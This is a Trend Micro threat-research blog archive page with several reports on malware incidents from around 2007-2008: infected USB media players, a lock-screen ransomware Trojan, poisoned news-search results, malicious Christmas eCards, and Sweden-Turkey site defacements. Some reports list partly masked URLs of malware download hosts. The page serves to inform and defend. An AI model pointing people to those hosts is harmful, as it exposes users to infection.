Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    December 2014
    S M T W T F S
    « Nov    
     123456
    78910111213
    14151617181920
    21222324252627
    28293031  
  • Email Subscription

  • About Us
    TrendLabs Security Intelligence Blog(breadcrumbs are unavailable)

    Author Archive - Mayee Corpin (Technical Communications)




    A batch of China-made media players sold over the holidays by a Dutch importer was found to carry malware. PCWorld, citing a Kaspersky blog post, identified the malware to be a worm. Trend Micro detects it as PE_FUJACKS.FL-O, a file infector that propagates not only via removable drives but also via network shares.

    The particular model involved is the 512 MB USB media player called Victory LT-200, which is sold by Victory Nederland. By the first week of January, only three customers have complained about the malware, according to the company’s managing director, Joost Blom, in an interview with PCWorld.

    This file infector searches the affected system for files with the following extensions:

    • COM
    • EXE
    • PIF
    • SCR

    These infected files are detected as PE_FUJACKS.EA.

    The Victory LT-200 is the latest in a long list of USB media shipped with malware. It can be recalled that October 2006 saw two such incidents, when iPod videos manufactured after September 11 of that year were shipped with WORM_SIWEOL.A and when McDonald’s Japan recalled MP3 player freebies when these were found to be infected by WORM_QQPASS.ADH.

    In the same year, satellite navigation devices called TomTom GO 910 shipped between September and November were confirmed to contain two Trojans detected as TROJ_PERLOVGA.A and TROJ_GENERIC. In 2007, another USB infection was seen, this time involving a rootkit detected as RTKT_XCP.B, which is installed along with the Sony MicroVault USM-F fingerprint reader application. This app allows a user to restrict access to files stored in the Sony MicroVault USM-F USB drive through the recognition of user-preset fingerprints.

    This latest USB incident again serves as a reminder that new doesn’t always mean safe. Be careful of plug-and-play peripherals that could bring off-the-shelf malware. Lucky for Trend Micro customers, they are now protected from this threat.

     
    Posted in Malware | Comments Off



    A new Trojan locks up machines completely and makes unwitting victims fork over an amount to be able to access their systems again, Sunbelt first reported. Trend Micro detects the said ransomware Trojan as TROJ_RANSOM.B.

    TrendLabs found that users could download the said malware from the site http://{BLOCKED}s-numericos.info/handlers/get.php?aid=46. Once it is on a system and has dropped its components, it renders the user incapable of using his machine and displays the following image:

    The message on top of the screen reads:

    ERROR: Browser Security and Antiadware Software component license exprited!

    Surfing PORN, ADULT and some other kind of sites you like without this software is dangerows and threatens with infection of your computer by harmful viruses, adware, spyware, etc… You strongly need to update your software to avoid infection and losting information from your computer. Please complete procedure of software update;

    Because the system’s “antiadware software” is supposedly already expired, the Trojan asks for a reactivation fee that affected users have the option of paying through SMS (short messaging service) or a call. If the user chooses the former, he/she only need send a text message to a specified number and will be charged £10, if in the UK. If, however, he/she chooses to make the call, he/she will be charged $35 in the US (or £1.50 for every minute, in the UK). Doing so, the user gets a “license code” that is the key to the “system unlock” to enable him/her to use his/her system again.

    The numbers used are premium rate, according to The Register, and differ depending on which country the user is in. In the UK, the regulator PhonePayPlus has said in an interview with the aforementioned IT news site that an adult line could have been misused for this purpose.

    The last we have seen of ransomware was back in August, when TROJ_GPCODE.AB and TROJ_GPCODE.AC were found to encrypt files with certain extensions, offering $150 to have the user’s files decrypted. A little earlier, in July, another ransomware detected as TSPY_KOLLAH.F also encrypted files with certain extensions, but demanded a heftier price ($300) to decrypt the files with their software. Both left behind ransom notes in README text files, offering software that could crack open the files, with set deadlines, too.

    The difference with this new strain is that it takes a different tactic by actually sounding more polite, even saying the magic word “please”. Even so, it is more “cruel” in the sense that it not only targets certain files but the machine itself.

    Trend Micro customers are already protected from this threat and won’t find themselves locked out of their systems.

     
    Posted in Malware | Comments Off



    Cybercriminals wasted no time riding on the tragic and shocking news of former Pakistan Prime Minister Benazir Bhutto’s assassination, as Websense discovered a number of malicious Web sites that came up on Google search results using the simple search term “benazir.” These sites attempt to infect users who want to know more about the unfortunate incident.

    TrendLabs researchers found that one of the sites in question indeed has an embedded malicious JavaScript redirect, which Trend Micro detects as JS_AGENT.AEVE.

    The malicious script downloads a Trojan (already detected TROJ_SMALL.LDZ), which in turn downloads more malicious files, namely WORM_HITAPOP.O and TROJ_AGENT.AFFR.

    A graphical representation of this routine is as follows:

    Upon further investigation, however, TrendLabs found that there is a host of other news sites and blogs taking advantage of this news.

    Moreover, the malicious JavaScript is apparently not exclusive to news sites — it is also present in other Web sites with a broad scope of topics and interests. There are many other sites that have been possibly compromised (or that include the malicious JavaScript), including Autoworld, Vino, Dogpile, MSN, BlogSpot (yes, again), etc.

    According to Trend Micro Advanced Threats Researcher Paul Ferguson, searching for this same malicious JavaScript code URL (the malicious script) yields 4,240 results. If the search is narrowed down to also include “benazir,” there would be only 103 results.

    All related malicious URLs are already blocked by the Content Security Team and are thus inaccessible to Trend Micro customers.

     



    It’s the most wonderful time of the year for most, including spammers who have started churning out Christmas-themed eCards in light of the approaching holidays.

    Spammers would like recipients to believe that these eCards come from a legitimate sender; the From line, which is spoofed, is displaying the name of a reputable company. Interestingly, the mail body bears the phrase “no worm, no virus” to falsely allay users’ fears of infection. But of course, since spammers are not exactly purveyors of truth, users do get infected.

    Clicking on the link http://{BLOCKED}tery.us/?id=ecard within the message body redirects users to the site http://{BLOCKED}n.unixbsd.info/~nuevocom/ItYatOk/index.php? that has an obfuscated script detected by Trend Micro as JS_AGENT.AEGJ, which further leads to the downloading of TROJ_DLOADER.XAP. The said script is also hosted on the following sites:

    • http://{BLOCKED}n.unixbsd.info/~nuevocom/ItYatOk/
    • http://64.27.{BLOCKED}.137/~nuevocom/ItYatOk/YM.exe
    • http://64.27.{BLOCKED}.137/~nuevocom/ItYatOk/uslotttery.exe

    The last two sites download files that are detected as WORM_SOHANAD.EU and WORM_VB.FQO, respectively.

    Christmas Day is some days away and in the interim, we can expect a glut of eCards of this nature. Remember that no matter how enticing, fancy eCards may not be out to spread good cheer but malware.

     
    Posted in Spam | 1 TrackBack »



    The world is not wanting in conflicts, either on the ground or online. A Web war is at present raging between Sweden and Turkey, said to be precipitated by another caricature of Islam’s Prophet Muhammad.

    More than 5,000 Swedish Web sites have been defaced by Turkish hackers since early October, according to the International Herald Tribune. Files were removed from the sites, which are mostly related to hotels, while some were replaced by messages posted by the hackers.

    Here’s a screenshot of a hacked Swedish site:

    Sample of a hacked Swedish site

    And a screenshot of another Web page that may be related to the group that defaced the Swedish sites:

    Although the link is not clearly established, the said defacement is believed to come in the wake of the publication of an editorial “moodog” cartoon, which showed the holy prophet’s head attached to a dog’s body. Indeed, some of the sites saw messages saying that the prophet had been violated. The said drawing was done by Lars Vilks and published in the Swedish newspaper Nerikes Allehanda on August 19. Vilks has since received a sizeable bounty on his head from an Iraqi insurgent leader.

    Sweden’s own hackers retaliated by putting up pornographic images in which the prophet and Mustafa Kemal Ataturk, founder and first President of the Turkish Republic, appear. The said images came out in a Turkish discussion forum whose members allegedly hacked the Swedish sites. Moreover, the Swedes stole the members’ user names, passwords, and homepages, along with their Hotmail and MSN instant messenger accounts. They also spammed out ugly, damaging messages to the Turkish account owners’ contacts.

    Trend Micro Senior Threat Researcher Ivan Macalintal cites inside accounts in saying that “this incident did not involve any of the usual malware activity that we usually find in Web threats. This was (more) like a socio-political and religious Web warfare between hacker groups in Turkey and Sweden.”

    It can be recalled that in 2005, a similar uproar was heard throughout the globe, caused by another of the prophet’s caricatures published in a Danish newspaper. This time around, the Web was the go-to platform for the Muslim protests, which were aired via hacking that was only met with more sophisticated hackinga case of fighting fire with fire. It proves nothing but that the innocentonline users or notalways get caught in the crossfire.

     
    Posted in Bad Sites | Comments Off


     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice